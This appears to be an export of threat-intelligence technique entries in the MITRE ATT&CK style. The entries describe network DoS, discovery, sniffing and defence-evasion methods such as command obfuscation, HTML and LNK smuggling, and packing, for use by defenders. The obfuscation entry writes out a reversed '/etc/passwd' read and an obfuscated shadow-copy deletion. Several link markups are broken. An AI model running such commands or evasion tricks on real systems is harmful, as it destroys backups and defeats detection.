Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.<sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup><sup>[[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)]</sup> This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.<sup>[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)]</sup><sup>[[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)]</sup><sup>[[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]</sup>

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.<sup>[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)]</sup><sup>[[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)]</sup><sup>[[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)]</sup><sup>[[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]</sup>

Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.<sup>[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)]</sup> Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).

The tag is: misp-galaxy:technique="Native API"

Network Address Translation Traversal

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.<sup>[[RFC1918](https://app.tidalcyber.com/references/f2cdf62e-cb9b-4a48-99a2-d46e7d9e7a9e)]</sup>

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities

The tag is: misp-galaxy:technique="Network Address Translation Traversal"

Network Boundary Bridging

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup> In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: misp-galaxy:technique="Network Boundary Bridging"

Direct Network Flood

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://app.tidalcyber.com/technique/66657af9-83f7-4a54-b41b-301bfcdae866)s are when one or more systems are used to send a high-volume of network packets towards the targeted service’s network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>

The tag is: misp-galaxy:technique="Direct Network Flood"

Reflection Amplification

Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.<sup>[[Cloudflare ReflectionDoS May 2017](https://app.tidalcyber.com/references/a6914c13-f95f-4c30-a129-905ed43e3454)]</sup> This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS<sup>[[Cloudflare DNSamplficationDoS](https://app.tidalcyber.com/references/734cb2bb-462a-4bdc-9774-6883f99379b9)]</sup> and NTP<sup>[[Cloudflare NTPamplifciationDoS](https://app.tidalcyber.com/references/09ce093a-d378-4915-a35f-bf18a278d873)]</sup>, though the use of several others in the wild have been documented.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.<sup>[[Cloudflare Memcrashed Feb 2018](https://app.tidalcyber.com/references/a2a0c1eb-20ad-4c40-a8cd-1732fdde7e19)]</sup>

The tag is: misp-galaxy:technique="Reflection Amplification"

Network Denial of Service

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).

The tag is: misp-galaxy:technique="Network Denial of Service"

Network Service Discovery

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.<sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.<sup>[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)]</sup><sup>[[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]</sup>

The tag is: misp-galaxy:technique="Network Service Discovery"

Network Share Discovery

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. <sup>[[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)]</sup> <sup>[[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)]</sup> [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

The tag is: misp-galaxy:technique="Network Share Discovery"

Network Sniffing

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup> Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup><sup>[[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)]</sup> The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup>

On network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as monitor capture.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]</sup>

The tag is: misp-galaxy:technique="Network Sniffing"

Non-Application Layer Protocol

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.<sup>[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)]</sup> Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup> Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.<sup>[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)]</sup> However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:technique="Non-Application Layer Protocol"

Non-Standard Port

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088<sup>[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]</sup> or port 587<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup> as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>

The tag is: misp-galaxy:technique="Non-Standard Port"

Binary Padding

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.<sup>[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]</sup> The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.<sup>[[Securelist Malware Tricks April 2017](https://app.tidalcyber.com/references/3430ac9b-1621-42b4-9cc7-5ee60191051f)]</sup> Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.<sup>[[VirusTotal FAQ](https://app.tidalcyber.com/references/5cd965f6-c4af-40aa-8f08-620cf5f1242a)]</sup>

The tag is: misp-galaxy:technique="Binary Padding"

Command Obfuscation

Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)) or interactively via [Command and Scripting Interpreter]([Akamai JS(https://app.tidalcyber.com/references/379a177b-0c31-5840-ad54-3fdfc9904a88)]</sup><sup>[[Malware Monday VBE](https://app.tidalcyber.com/references/9b52a72b-938a-5eb6-a3b7-5a925657f0a3)]</sup>

For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, ^, `. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.<sup>[[RC PowerShell](https://app.tidalcyber.com/references/0f154aa6-8c9d-5bfc-a3c4-5f3e1420f55f)]</sup> Many languages support built-in obfuscation in the form of base64 or URL encoding.<sup>[[Microsoft PowerShellB64](https://app.tidalcyber.com/references/7e50721c-c6d5-5449-8326-529da4cf5465)]</sup> Adversaries may also manually implement command obfuscation via string splitting (`“Wor”“d.Application”), order and casing of characters (rev <<<'dwssap/cte/ tac'), globing (mkdir -p '/tmp/:&$NiA'), as well as various tricks involving passing strings through tokens/environment variables/input streams.<sup>[[Bashfuscator Command Obfuscators](https://app.tidalcyber.com/references/c0256889-3ff0-59de-b0d1-39a947a4c89d)]</sup><sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup>

Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete).<sup>[[Twitter Richard WMIC](https://app.tidalcyber.com/references/7d701a8e-6816-5112-ac16-b36e71d7c5db)]</sup>

Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.<sup>[[Invoke-DOSfuscation](https://app.tidalcyber.com/references/d2f7fe4a-1a3a-5b26-8247-4f05c96974bf)]</sup><sup>[[Invoke-Obfuscation](https://app.tidalcyber.com/references/4cc6a80f-d758-524b-9519-5b839d4918bd)]</sup>

The tag is: misp-galaxy:technique="Command Obfuscation"

Compile After Delivery

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.<sup>[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]</sup>

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.<sup>[[TrendMicro WindowsAppMac](https://app.tidalcyber.com/references/dc673650-1a37-4af1-aa03-8f57a064156b)]</sup>

The tag is: misp-galaxy:technique="Compile After Delivery"

Dynamic API Resolution

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.

API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.<sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup><sup>[[IRED API Hashing](https://app.tidalcyber.com/references/1b8b87d5-1b70-401b-8850-d8afd3b22356)]</sup>

To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://app.tidalcyber.com/technique/9ed5db23-3b2a-4a08-8602-bc8dff5c80f0), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.

Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) during execution).<sup>[[BlackHat API Packers](https://app.tidalcyber.com/references/fc4434c0-373b-42fe-a0f5-683c24fa329e)]</sup><sup>[[Drakonia HInvoke](https://app.tidalcyber.com/references/11d936fd-aba0-4eed-8007-aca71c340c59)]</sup><sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup>

The tag is: misp-galaxy:technique="Dynamic API Resolution"

Embedded Payloads

Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://app.tidalcyber.com/technique/73a8b954-93fe-466c-b73d-bd35bb08c3e7) by not impacting execution controls such as digital signatures and notarization tickets.<sup>[[Sentinel Labs](https://app.tidalcyber.com/references/785f7692-2be8-4f5d-921e-51efdfe0c0b9)]</sup>

Adversaries may embed payloads in various file formats to hide payloads.<sup>[[Microsoft Learn](https://app.tidalcyber.com/references/73ba4e07-cfbd-4b23-b52a-1ebbd7cc0fe4)]</sup> This is similar to [Steganography](https://app.tidalcyber.com/technique/f22d0738-dcb7-40c2-99cf-b426ac54224a), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.<sup>[[GitHub PSImage](https://app.tidalcyber.com/references/449c873c-c5af-45b8-8bd7-505d2181a05c)]</sup>

For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.<sup>[[Securelist Dtrack2](https://app.tidalcyber.com/references/a011b68a-30e0-4204-9bf3-fa73f2a238b4)]</sup> Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup>

Embedded content may also be used as [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) payloads used to infect benign system processes.<sup>[[Trend Micro](https://app.tidalcyber.com/references/2d4cb6f1-bc44-454b-94c1-88a81324903e)]</sup> These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.<sup>[[Malware Analysis Report ComRAT](https://app.tidalcyber.com/references/9d81e2c8-09d5-4542-9c60-13a22a5a0073)]</sup>

The tag is: misp-galaxy:technique="Embedded Payloads"

Fileless Storage

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup><sup>[[SecureList Fileless](https://app.tidalcyber.com/references/03eb080d-0b83-5cbb-9317-c50b35996c9b)]</sup>

Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) and [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.

Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://app.tidalcyber.com/technique/8e32b6ed-58b1-4708-8b86-bd29c3a544d2)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.

Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., %SystemRoot%\System32\Wbem\Repository) or Registry (e.g., %SystemRoot%\System32\Config) physical files.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup>

The tag is: misp-galaxy:technique="Fileless Storage"

HTML Smuggling

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup>

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920)), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup><sup>[[nccgroup Smuggling HTA 2017](https://app.tidalcyber.com/references/f5615cdc-bc56-415b-8e38-6f3fd1c33c88)]</sup>

The tag is: misp-galaxy:technique="HTML Smuggling"

Indicator Removal from Tools

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

The tag is: misp-galaxy:technique="Indicator Removal from Tools"

LNK Icon Smuggling

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the IconEnvironmentDataBlock) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.

Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](System Binary Proxy Execution(https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655) arguments within the target path field of the LNK.<sup>[[Unprotect Shortcut](https://app.tidalcyber.com/references/b62d40bc-2782-538a-8913-429908c6a2ee)]</sup><sup>[[Booby Trap Shortcut 2017](https://app.tidalcyber.com/references/1a820fb8-3cff-584b-804f-9bad0592873b)]</sup>

LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.

The tag is: misp-galaxy:technique="LNK Icon Smuggling"

Software Packing

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.<sup>[[ESET FinFisher Jan 2018](https://app.tidalcyber.com/references/be169308-19e8-4ee9-8ff6-e08eb9291ef8)]</sup>

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.<sup>[[Awesome Executable Packing](https://app.tidalcyber.com/references/565bf600-5657-479b-9678-803e991c88a5)]</sup>

The tag is: misp-galaxy:technique="Software Packing"

Steganography

